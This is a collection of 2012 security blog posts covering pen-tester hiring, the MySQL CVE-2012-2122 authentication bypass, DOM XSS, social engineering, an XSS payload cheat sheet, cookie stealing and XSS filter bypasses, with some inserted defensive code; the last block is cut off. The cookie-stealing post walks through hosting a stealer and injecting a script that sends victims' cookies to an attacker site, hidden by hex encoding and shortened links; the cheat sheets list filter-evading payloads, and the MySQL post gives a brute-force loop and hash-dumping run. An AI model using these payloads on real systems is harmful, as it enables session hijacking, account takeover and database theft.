Showing posts with label Penetration Testing. Show all posts

Friday, June 22, 2012

Finding a Qualified Penetration Tester for Your Site



The penetration testing industry is enjoying an upsurge as more high-profile security breaches are reported in the media, such as the recent LinkedIn password debacle, and companies scramble to tighten up their systems. Done correctly, pen testing can illuminate security flaws in a network by utilizing the skills and viewpoint of an external third party, which in most cases, to be frank, is a great hacker.

It is the classic case of thinking like a criminal in order to catch one. A penetration tester should not be culled from the ranks of your average computer science major or CIO, as they lack the necessary "underground" experience and mentality to truly think the way professional exploiters do.

So what qualities should be looked for in a penetration tester, to find one that will think like a criminal without actually being one? Here are some hallmarks.

Extreme intelligence and problem-solving skills
A good penetration tester must be able to take disparate or incomplete data sets and, from them, fill in the gaps to discern possible attack vectors and approaches. Linear thinking is not enough — the thought process of a pen tester should allow him to take one piece of data and figure out all the ways that data can be applied in conjunction with other, seemingly unrelated data. This requires a high I.Q. and a tremendous amount of persistence.

Thinking outside the box
As security methods increase in sophistication, pen testers should be able to adapt and explore non-obvious ways to penetrate a system. This includes phishing and social engineering attacks against live staff to test real-world vulnerabilities. One could conceivably go so far as to walk around an office at night, as if one were a janitor, to discover whether login information is available on yellow Post-Its stuck on monitors.
Furthermore, thinking outside the box is required for a tester to come up with new attacks, rather than simply Google existing ones like a script kiddie.

Understands the end goal
Penetration testers should keep in mind that the end goal is not bragging rights or the simple thrill of popping a target box, but to improve the enterprise's security protocols to protect both it, and potentially millions of customers, from financial or privacy loss. As there are usually time and budget concerns, the pen tester should therefore focus on discovering the critical vulnerabilities with the highest potential impact first, then move on to secondary and tertiary layers of vulnerability.

As such, they need to demonstrate the ability to see the big picture of why a system would be attacked and what the intruder would be trying to achieve once they gain a foothold. Compromising one machine on a network would not be enough; the attack should be carried out until all further vulnerabilities now possible from that one compromised box are discovered — especially ones that lead to social security numbers, bank account information, or trade secrets — which are the areas a hacker group would most likely be targeting.

Solutions-oriented
It is not enough to infiltrate a system and report the findings. The true value of a penetration tester lies in his or her ability to provide recommendations to fix all vulnerabilities found. It is here where the hacker hat is taken off and replaced with the consultant hat to advise on the best possible solutions to lock down a network.

Pen testers should also offer follow-up tests or provide means for in-house IT staff to verify holes have been patched.

Communication skills
Lastly, a pen tester must be able to communicate in non-technical terms to executives and others reading the final report. Complex jargon and scripting recommendations should be reserved for the enterprise's IT staff, coming after a plain-English summary with illustrative graphics and charts that your average business person can grasp. Try reading a sample report from the tester and see whether you can make heads or tails of it. If not, move on.

Penetration testing is intensive work. Anyone can use software to scan for common vulnerabilities, but only a real pro can go beyond the automated tests and delve into the nooks and crannies, just like a live, criminal hacker gang would.

Author Bio
John Dayton is a freelance writer who contributes to LWG Consulting, a company that provides forensic consulting services, including computer security.

Tuesday, June 12, 2012

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB


News about the vulnerability in MySQL and MariaDB is spreading like wildfire. I have covered this vulnerability on E Hacking News as a news article. Here, I am going to share the same thing from the perspective of a penetration tester.

MySQL and MariaDB versions 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are the affected versions.

The vulnerability allows an attacker to access a MySQL database without entering proper authentication credentials. It can only be exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range.

According to Golubchik, gcc's built-in memcmp and the BSD libc are safe, but the Linux glibc SSE-optimised memcmp is not.

Not all Linux distros are affected; only the following systems are known to be vulnerable:
* Ubuntu Linux 64-bit (10.04, 11.10, 11.04, 12.04)
* openSUSE 12.1 64-bit, MySQL 5.5.23-log
* Debian Unstable 64-bit, 5.5.23.2
* Fedora
* Arch Linux

In order to test for the vulnerability, run the following bash loop (the original was missing the space between the host and the redirection, which turned the host into 127.0.0.12):
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Against an affected MySQL server, the loop above will eventually be granted access as the root user account.
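As an added example (not from the original post, nor MySQL's own code), the following JavaScript models the root cause of the flaw: MySQL's check_scramble() returned the int result of memcmp() through a char-sized my_bool, and Int8Array reproduces that int-to-char truncation exactly. wideMemcmp() is a constructed stand-in for an optimised libc memcmp, and the stored digest is constructed, not a real hash.

```javascript
// Added example: models CVE-2012-2122, not MySQL source code.
const SCRAMBLE_LENGTH = 20; // bytes in a SHA1 digest, as in MySQL

// Constructed stand-in for an optimised libc memcmp: compares 16-bit words and
// returns their arithmetic difference, so results can fall outside -128..127.
// The C standard only fixes the sign of memcmp's result, not its magnitude.
function wideMemcmp(a, b) {
  let i = 0;
  for (; i + 1 < a.length; i += 2) {
    const wa = a[i] | (a[i + 1] << 8);
    const wb = b[i] | (b[i + 1] << 8);
    if (wa !== wb) return wa - wb;
  }
  for (; i < a.length; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Models "return memcmp(...)" assigned to a C char: the value wraps modulo 256
// and is then read back as a signed 8-bit number.
function toMyBool(n) {
  return new Int8Array([n])[0];
}

// Vulnerable pattern: 0 means "digests match". Any difference that happens to
// be a multiple of 256 truncates to 0 and the client is logged in.
function checkScrambleVulnerable(computed, stored) {
  return toMyBool(wideMemcmp(computed, stored));
}

// Fixed pattern: collapse the comparison to 0/1 before it can be truncated,
// so only a true zero difference is reported as a match.
function checkScrambleFixed(computed, stored) {
  return toMyBool(wideMemcmp(computed, stored) !== 0 ? 1 : 0);
}

// Deterministic stored digest for the demonstration (constructed, not a real
// hash). Its first little-endian word is 256, so a wrong first word that
// differs by a multiple of 256 yields a memcmp result that truncates to 0.
function storedDigest() {
  const d = new Uint8Array(SCRAMBLE_LENGTH);
  for (let i = 0; i < SCRAMBLE_LENGTH; i++) d[i] = (i * 37 + 11) & 0xff;
  d[0] = 0x00;
  d[1] = 0x01;
  return d;
}

// Try every 16-bit value for the first word of the candidate digest against
// the stored one and count how many the given check accepts. Exactly one
// candidate is the real match; every other acceptance is an auth bypass.
function countAccepted(check) {
  const stored = storedDigest();
  const candidate = Uint8Array.from(stored);
  let accepted = 0;
  for (let w = 0; w < 65536; w++) {
    candidate[0] = w & 0xff;
    candidate[1] = (w >> 8) & 0xff;
    if (check(candidate, stored) === 0) accepted++;
  }
  return accepted;
}

console.log(`vulnerable check accepts ${countAccepted(checkScrambleVulnerable)} of 65536`); // 256
console.log(`fixed check accepts      ${countAccepted(checkScrambleFixed)} of 65536`);      // 1
```

The 256-in-65536 acceptance rate is the 1-in-256 odds behind the 1000-iteration loop above: with a wrong password, roughly one connection attempt in 256 produces a memcmp result that truncates to zero.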

The following video was provided by an EHN reader:


Exploiting using Metasploit:
One Metasploit contributor committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below, using the latest Metasploit Framework GIT/SVN snapshot:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Wednesday, May 2, 2012

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial


So far I have explained traditional cross site scripting, which occurs because of insecure server-side code. In this post, I am going to explain the DOM-based cross site scripting vulnerability. If you don't know what cross site scripting is, then I recommend you read the basics from here.

Before explaining DOM-based XSS, let me explain what the DOM is.

What is the DOM?
DOM stands for Document Object Model; it allows client-side scripts (e.g. JavaScript) to dynamically access and modify the content, structure, and style of a webpage.

Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of the DOM.

Here is a very simple HTML page that accepts and writes user input using JavaScript with the help of the DOM.

<html>
<head>
</head>
<body>
  <script>
    var pos = document.URL.indexOf("BTSinput=") + 9;                   // find the position of the value
    var userInput = document.URL.substring(pos, document.URL.length);  // copy the value into userInput
    document.write(unescape(userInput));                                // write the content to the webpage
  </script>
</body>
</html>

If you know HTML and JavaScript, understanding the above code is a piece of cake.

In the above example, the JavaScript code gets the value of the URL parameter "BTSinput" and writes that value into our webpage.

For example, if the url is
               www.BreakThesecurity.com/PenTesting?BTSinput=default
The webpage will display "default" as output.


Did you notice? That part of the webpage is not written by a server-side script. The client-side script modifies the content dynamically based on the input, all with the help of the DOM object 'document'.

DOM Based XSS vulnerability:
When a developer writes content using a DOM object without sanitizing the user input, it allows an attacker to run his own code.

In the above example, we failed to sanitize the input and simply displayed whatever value we got from the URL.

An attacker with malicious intent can inject an XSS vector instead. For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>




As I said earlier, the document.write function simply writes the value of the BTSinput parameter into the webpage. So it will write '<script>alert("BreakTheSec")</script>' into the webpage without sanitizing it. This results in the script code running and displaying the alert box.


Patching the DOM Based Cross Site Scripting Vulnerability
Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious:

The document.write() function
The document.writeln() function
The eval() function, which executes JavaScript code from a string
The execScript() function, which works similarly to eval()
The setInterval(), setTimeout(), and navigate() functions
The .innerHTML property of a DOM element
Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.
The event handler properties like .onClick, which take JavaScript code as their values

Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values.

You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through.
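As an added example (not the tutorial's own code), here is the tutorial's extraction logic beside a hardened version that applies the whitelist escaping recommended above, written to run under Node.js without a browser DOM; the function names are the example's own.

```javascript
// Added example: the vulnerable DOM-XSS pattern from the tutorial next to a
// hardened version. Runs under Node.js; no browser document is needed because
// both functions return the string that document.write() would receive.

// Mirrors the tutorial's indexOf/substring/unescape extraction. Note that when
// the parameter is absent indexOf() returns -1, so pos becomes 8 and the tail
// of the URL is written out instead of an empty string.
function vulnerableRender(url) {
  const pos = url.indexOf("BTSinput=") + 9;
  const userInput = url.substring(pos, url.length);
  return unescape(userInput); // sink: any markup in the parameter is written as HTML
}

// Whitelist escaping as recommended in the post: everything that is not
// [A-Za-z0-9] becomes a numeric character reference, so no input can close a
// tag, start a script element or inject an attribute.
function escapeAllButAlnum(s) {
  let out = "";
  for (const ch of s) {
    out += /^[A-Za-z0-9]$/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`;
  }
  return out;
}

// Hardened version: parse the query string properly (a missing parameter
// yields "" rather than the tail of the URL), then escape the value before it
// is written into the document.
function hardenedRender(url) {
  const params = new URL(url).searchParams;
  const userInput = params.get("BTSinput") ?? "";
  return escapeAllButAlnum(userInput);
}

// Returns true if the rendered string still contains an HTML tag, i.e. the
// sink would interpret untrusted input as markup.
function containsMarkup(rendered) {
  return /<[a-z!\/]/i.test(rendered);
}

// The tutorial's two URLs, given a scheme so that new URL() accepts them.
const BENIGN = "http://www.BreakThesecurity.com/PenTesting?BTSinput=default";
const ATTACK = 'http://www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>';

console.log("vulnerable:", vulnerableRender(ATTACK)); // the script tag reaches the page
console.log("hardened:  ", hardenedRender(ATTACK));   // &#x3c;script&#x3e;alert... : inert text
```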

Reference:
http://www.rapid7.com/vulndb/lookup/http-client-side-xss


Wednesday, April 4, 2012

The Art of Human Hacking -Social Engineering(SE) tutorial series



Hello BTS readers, here we come with an interesting tutorial written by my friend Mr. Ashish Mistry, who is the founder of Hcon and author of the 'HconSTF' project.


Hello all,

After a long time I have started writing again, in the hope that my belief in "sharing the spirit of learning" is fulfilled. So from today I am going to write a series of tutorials on my favorite topic, 'Social Engineering' (SE).

We start with a small introduction to the very basics of what SE is, why you should learn and use it, and how it works, and as we go further in this series we will look at 'leveraging SE into penetration testing'.

Disclaimer: All the examples used in this tutorial series are either my own or random picks from the internet and social networks, so if any example accidentally matches your situation, nobody can hold me responsible for anything in any regard whatsoever. These are just examples for educational purposes only, and I have no intention of offending anyone or anything.
These tutorials are for educational purposes only; only you as the reader are responsible for whatever you do with the material published here, not the author and not the site.

So let us begin with the first tutorial on SE.

What is social engineering?
It is the art of manipulating humans.
In simpler words: 'tricking people so that they do what YOU want from them, or so that you get it done by them'.

Confused?

Let's take an example:
Suppose you go to a toy shop with your child, and your child wants a toy car, so he asks the salesperson to show him a car, or one he may have seen on display. The salesperson shows him that car, or always starts with a costly car, so when the boy sees the car he asks to take that car only, because the salesperson showed him features like lights and a remote control. But the toy car is too costly for this month's budget, and the boy wants it anyhow, so you try to divert the child to some other car that fits your budget a little better. As he is a small child he does not listen to you, and at the end of all this,
either you buy the costly car the child wanted, or he gets nothing, or he gets some other car.

Now you might ask me, "So what's new in this? It's very normal, every child does it, right?" But the point of this example is to explain a perfectly crafted and executed 'social engineering attack' in our day-to-day life.
In the above example the social engineer was the shop's salesperson, who used the child to sell a costly car and get more money from you.

Basically the salesperson targeted the nature of that child, because he knows that once a child is shown what it wants, it is very difficult for the parents to divert the child, so he can sell as HE wants.

So if you understand basic exploitation terms, then:
  • Attacker = the salesperson
  • Vulnerability (weakness) = the child (actually his obvious nature)
  • Exploit (trick) = showing the more costly car and showing more of its features to gain more of the child's attention
  • Payload (purpose) = more money from you
  • Target = yes, you guessed it right, it's YOU :)


Let's take another example:

This one is a simple but real-world example from Facebook:
a person shared this image of a quote from the honorable Mr. APJ Abdul Kalam.

It's good, right? He is proud of him or liked the quote, right?
But now let's try to understand it from the SE point of view.
There are some things to note in the photograph:
1. on the image, a website address is present
2. below the image, the website address is written again

First let me tell you that the web address was not that of any government site but of a private product-trading site which is totally unrelated to what the image is, and marking the image with it is quite a disrespect on the part of that person. Anyway,
why would anyone do this?

This is a very simple but clever kind of SE:
  • Attacker = whoever initially edited this photo to add the web address
  • Vulnerability (weakness) = the human nature of sharing and liking good photos/quotes
  • Exploit (trick) = the edited photo carrying the quote
  • Payload (purpose) = marketing of his website, and reaching more audience for his business for FREE
  • Target = anyone on Facebook who shares this photo

Another noticeable point is that if you see anything your mind likes, it gets stored somewhere in your mind, so when anyone around you asks or talks about property or trading, your mind might flash back to this site.
Now, after this example, let's refine and add to our previous simple definition of SE.

"It is the art of manipulating people so that they do as you want or give you what you want from them. Without any kind of physical offense, it is a whole psychological process of targeting other people's minds to gain their TRUST and exploit it, using human weaknesses against the target by crafting SE attacks according to the kind of work we want to get done by others."

Hopefully by now you have got the idea of social engineering (SE), and some things to start understanding and observing it. But yes, every human and their psychological behavior is different; studying your target and crafting the attack according to your goal will give more success. For this, one of the key things is observation and the quick responsive ability of the attacker or social engineer.

So who can be considered a social engineer?
It can be anyone from your relative/friend convincing you to do or believe what they say, even if you don't want to do it or believe it.

It can be a salesperson, a marketing person, a thief/con artist, your boss, penetration testers, forensics experts or anyone around you!

More on it: it's not a new thing, but has been used for centuries by different people, even if you consider any historical persons from your nation.

Think about it: might you have been social engineered by someone? Somewhere?

That's all for this first introductory tutorial.
If you have any questions, want to give feedback, or want anything explained in this tutorial series, please post in the comments.


Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

Tuesday, February 7, 2012

Complete Cross site Scripting(XSS) cheat sheets : Part 1


I am providing this XSS cheat sheet after collecting the exploit codes from hackers' techniques and different sites, especially http://ha.ckers.org/xss.html. This is a complete list of XSS cheat codes which will help you to test for XSS vulnerabilities and is useful for bypassing filters. If you have any different cheat codes, please send your code.

Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>

<script>alert("XSS");</script>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

<script>alert(/XSS")</script>

<script>alert(/XSS/)</script>

When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//


Bypassing with toggle case:
--------------------------------------
 <ScRiPt>alert(1)</sCriPt>
  <IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 <IMG SRC=javascript:alert('XSS')>      

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

Bypass the script tag filtering:
--------------------------------------------------

<<SCRIPT>alert("XSS");//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

foo<script>alert(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt>

Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet.  Soon we will publish the part 2.



Thursday, January 26, 2012

E Hacking News & PenTest Partnership announced!




We’re proud to announce that we’ve just partnered with PenTest Magazine!
About PenTest Magazine:

PenTest Magazine is a weekly downloadable IT security mag, devoted exclusively to penetration testing. It features articles by penetration testing specialists and enthusiasts, experts in vulnerability assessment and management. We cover all aspects of pen testing, from theory to practice, from methodologies and standards to tools and real-life solutions. Each magazine features a cover focus, and articles from our regular contributors, covering IT security news and up-to-date topics.

The magazine is available by paid subscription. It is devoted to the best penetration testing services providers, who will show you the pen testing world from their perspective. It’s an excellent opportunity to observe security trends on the market for the readers, and for companies – to share their invaluable knowledge.

PenTest Magazine features 48 issues a year – 4 issues a month. A different title is published every week:
  • PenTest Regular – 1st of every month
  • Auditing & Standards PenTest – 7th of every month
  • PenTest Extra – 15th of every month
  • Web App Pentesting – 22nd of every month


Each week there is another leading topic for the issue. Whilst PenTest Regular is devoted to more general and overall topics, the three remaining issues each focus on a specific problem.
Purchasing PenTest Magazine, the only publication devoted exclusively to PenTesting, you get almost 200 pages of content every month.

For any questions or inquiries please mail us at: en@pentestmag.com


Tuesday, January 3, 2012

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials



Hopefully you are now familiar with the XSS vulnerability (if you don't know what it is, read the beginners' XSS tutorial). This is my fourth article about XSS vulnerability testing (PenTesting)! Today I am going to explain how an attacker exploits an XSS vulnerability and steals cookies from users.

Warning!!!
BTS does not take responsibility if anyone tries these hacks against any organization or anything else that makes him trespass security measures and brings him under legal prosecution. This tutorial is intended for the improvement of security and for PenTesting and investigations by legal security agencies.

Requirements:
  • A cookie stealer code: get it from here
  • A free web hosting service
  • Basic knowledge about XSS
  • Basic knowledge about computer cookies
Cookie stealing is the process of exploiting an XSS vulnerability (non-persistent/persistent) to steal the cookie of the victim who visits the infected link. These cookies can then be used to compromise their accounts.

Step 1: Creating the cookie stealer PHP file
Get the cookie stealer from the link I mentioned. In that post, I have explained three versions of the cookie stealer. We are going to use the third version.
• Copy the code.
• Open Notepad and paste the code.
• Save the file with a .php extension
  Eg: Stealer.php
Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name we give in the PHP file.

Now you will have two files:
1. Stealer.php
2. log.txt

What do these two files do exactly?
The Stealer.php file gets the IP address and cookie and stores the data in the log.txt file.
The log.txt file holds the cookie and IP address details.

Step 2:
Register with a free web-hosting service and log in to your cPanel.
Now open the File Manager in cPanel.
Upload Stealer.php and log.txt to the root folder or the public_html folder.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS vulnerability
So far, we have sharpened our saw. Now we are going to use it.
Once you have set up everything and found a vulnerable site, inject the following code into the vulnerable site.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie stealing with non-persistent vs persistent XSS:
Persistent: if you inject this code into a site vulnerable to persistent XSS, it will be there forever until the admin finds it. It will be shown to all users, so attackers don't need to send any link to others. Whoever visits the page will be a victim.

Non-persistent:
In the case of a non-persistent attack, the attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most sites are vulnerable to non-persistent XSS.

In the non-persistent case, attackers will send the injected link to victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above link clearly shows the script. Hackers can hex-encode this script so that the victim can't see it.
For example:
hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
Still, the link looks long. The attacker uses one more trick to hide the long URL: URL-shortening sites. There are lots of sites that shorten a long URL into a tiny URL.

For example:
hxxp://www.tinyexample.com/twrwd63

Once the victim follows the link, his cookie will be stored in the log.txt file.

How to be secure from this attack?
• Use the NoScript add-on. This is the best protection to stay away from XSS.
• Never click a shortened URL.
• Sometimes you may want to follow a shortened link. If so, clear all cookies in your browser and visit through a proxy or VPN (it will hide your IP).
• (Later we will cover security tips for site admins, so stay tuned.)

Sunday, December 25, 2011

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing



copyrights reserved © BreakTheSecurity
Hi friends, last time I explained what XSS is and how an attacker can inject a malicious script into your site. As I promised earlier, I am writing this advanced XSS tutorial for you (still more articles will come).

Sometimes website owners use XSS filters (WAF) to protect against XSS vulnerabilities.
For eg: if you put in <script>alert("hi")</script>, the filter will escape the " (quote) character, so the script will become
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise, filters use different types of filtering methods to give protection against XSS. In this case, we can use some tricks to bypass the filter. Here I am going to cover only that.

1. Bypassing magic_quotes_gpc

magic_quotes_gpc=ON is a PHP setting (configured in the php.ini file) that automatically escapes every ' (single quote), " (double quote) and \ with a backslash.
For eg:
<script>alert("hi");</script> will be filtered as <script>alert(\"hi\");</script>, so the script won't work now.

This is a well-known filtering method, but we can easily bypass this filter by using ASCII character codes instead.
For eg: alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>. In this case there is no " (double quote), ' (single quote) or / so the filter can't filter this. Yes, it will successfully run the script.
String.fromCharCode() is a JavaScript function that converts ASCII values to characters.

How to convert to ASCII values?

There are some online sites that convert text to ASCII codes, but I suggest you use the Hackbar Mozilla add-on.

After installing the Hackbar add-on, press F9. It will open a small box above the URL bar. Click XSS -> String.fromCharCode().

Now a small window will pop up. Enter the code, for instance alert("Hi"), and click the OK button. Now we have the output.

Copy the code inside <script></script> and insert it into the vulnerable site.

For eg:
hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

2. HEX Encoding

We can encode our whole script into hex so that it can't be filtered.
For example: <script>alert("Hi");</script> can be converted to hex as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site's request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/

3. Bypassing using Obfuscation

Some website admins put script and alert in a restricted word list, so whenever you input these keywords, the filter will remove them and give an error message like "you are not allowed to search this". This can be bypassed by changing the case of the keywords (namely obfuscation).
For eg:
<ScRipt>ALeRt("hi");</sCRipT>

This bypass technique rarely works, but giving it a try is worthwhile.

4. Closing Tag

Sometimes putting "> at the beginning of the code will work.

"><script>alert("Hi");</script>

This will end the previously opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

Conclusion:
From the above article, it is clear that XSS filters alone are not going to protect a site from XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application, or test it yourself.

Also, there are lots of different filter-bypassing techniques; I have just covered some useful ones for you.
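As an added example (not from this post or the cookie-stealing post above), this Node.js script shows the defender's side of both: it normalises request URIs from web server access logs, undoing the percent/hex encoding (single and double), case toggling and String.fromCharCode() tricks described here, and then matches the cookie-stealing and alert() payloads. The log lines, client IPs and the attacker.example host are constructed placeholders.

```javascript
// Added example: detection logic for the XSS payloads described in the two
// posts, run over constructed access-log lines. Not code from the original site.

// Decode percent-encoding repeatedly: the posts show single (%3c) and double
// (%253c) encoding used to slip past filters that decode only once.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; } // malformed %xx: stop decoding
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Replace String.fromCharCode(97, 108, ...) with the text it builds, so that
// "alert" hidden as character codes is matched like plain "alert".
function foldFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(([\d,\s]+)\)/gi, (_, codes) =>
    String.fromCharCode(...codes.split(",").map((c) => parseInt(c, 10))));
}

// Canonical form used for matching: decoded, folded, lower-cased (defeats <ScRiPt>).
function normalise(uri) {
  return foldFromCharCode(fullyDecode(uri)).toLowerCase();
}

// Indicators taken from the payloads in the posts: a script tag in any case,
// the cookie exfiltration idiom, the redirect sink it is fed into, and the
// alert() probe used to confirm a vulnerability.
const INDICATORS = [
  { name: "script-tag", re: /<\s*script\b/ },
  { name: "cookie-exfil", re: /document\.cookie/ },
  { name: "redirect-sink", re: /location\.href\s*=/ },
  { name: "alert-probe", re: /alert\s*\(/ },
];

// Combined log format: ip ident user [time] "METHOD uri PROTO" status size
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  return m ? { ip: m[1], time: m[2], method: m[3], uri: m[4], status: m[5] } : null;
}

// Returns one finding per suspicious request: client IP, matched indicator
// names, and the decoded URI an analyst would want to see.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const norm = normalise(req.uri);
    const hits = INDICATORS.filter((ind) => ind.re.test(norm)).map((ind) => ind.name);
    if (hits.length) findings.push({ ip: req.ip, indicators: hits, decoded: norm });
  }
  return findings;
}

// Constructed sample lines: a benign search, the hex-encoded cookie stealer
// pointing at a placeholder host, and a double-encoded, case-toggled probe.
const SAMPLE_LOG = [
  '203.0.113.5 - - [03/Jan/2012:10:00:01 +0000] "GET /index.php?search=laptops HTTP/1.1" 200 512',
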